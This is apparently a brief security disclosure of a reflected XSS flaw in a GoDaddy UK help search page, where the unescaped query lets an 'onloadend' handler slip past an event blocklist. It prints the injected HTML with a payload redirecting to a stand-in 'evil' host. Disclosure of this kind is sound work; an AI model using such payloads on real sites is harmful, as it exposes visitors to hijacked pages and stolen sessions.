XSS vulnerability through the help search results page.
The search query is sent as a GET parameter and is not escaped when rendered in the heading in the page, even though immediately after, it is escaped. This allows code to be executed directly from a malicious URL.
There was some protection where the site returned a 403 if you attempted to put onload or onhover events. This a bad case of trying to whitelist specific JavaScript events in an attempt to prevent XSS.
<h1 class="app-title"><span>Showing results for </span><a href="//uk.godaddy.com/help/search?q=bob" onloadend="document.location=http://evil"><b><i>bob" onloadend="document.location=http://evil</i></b></a></h1>
Reported Fixed Unknown
Back